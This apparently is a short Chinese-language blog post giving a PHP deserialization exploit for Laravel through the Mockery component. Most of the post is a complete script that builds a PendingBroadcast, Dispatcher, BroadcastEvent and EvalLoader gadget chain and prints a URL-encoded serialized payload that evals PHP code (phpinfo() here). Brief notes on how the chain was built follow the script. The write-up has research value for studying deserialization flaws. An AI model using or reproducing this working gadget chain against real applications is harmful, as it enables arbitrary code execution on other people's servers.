Laravel mockery组件
exp:
<?php
namespace Illuminate\Broadcasting{
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events,$event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Mockery\Generator{
class MockDefinition
{
protected $config;
protected $code = '<?php phpinfo();?>';
public function __construct($config)
{
$this->config = $config;
}
}
}
namespace Mockery\Generator{
class MockConfiguration
{
protected $name = '1234';
}
}
namespace Mockery\Loader{
class EvalLoader
{
public function load(MockDefinition $definition)
{
}
}
}
namespace{
$Mockery = new Mockery\Loader\EvalLoader();
$queueResolver = array($Mockery, "load");
$MockConfiguration = new Mockery\Generator\MockConfiguration();
$MockDefinition = new Mockery\Generator\MockDefinition($MockConfiguration);
$BroadcastEvent = new Illuminate\Broadcasting\BroadcastEvent($MockDefinition);
$Dispatcher = new Illuminate\Bus\Dispatcher($queueResolver);
$PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($Dispatcher,$BroadcastEvent);
echo urlencode(serialize($PendingBroadcast));
}
?>
构造过程
入口类: PendingBroadcast
这里的
$this->events 是 Dispatcher 接口的,这里我们找到一个实现了 Dispatcher 接口的类
跟进
看一下
commandShouldBeQueued 方法
要求 $command 实现了 ShouldQueue 接口,注意此时的 $command 其实就是 PendingBroadcast的 $event(是可控的)
找到其中一个类
BroadcastEvent,我们可以将 PendingBroadcast 的 $event 覆盖为 BroadcastEvent
继续跟进 dispatchToQueue 方法,看到 call_user_func 方法
注意此时的
$command 其实已经覆盖为 BroadcastEvent 类了,connetcion 属性可控
此时我们要考虑调用哪个函数,这里使用了 EvalLoader 类
如果要调用这个函数,那么 if 条件必须是 false,查看 MockDefinition 类
覆盖 $this-config 为 MockConfiguration 这个类,给它的 name 属性随便赋值即可
ok就到这里了
网友评论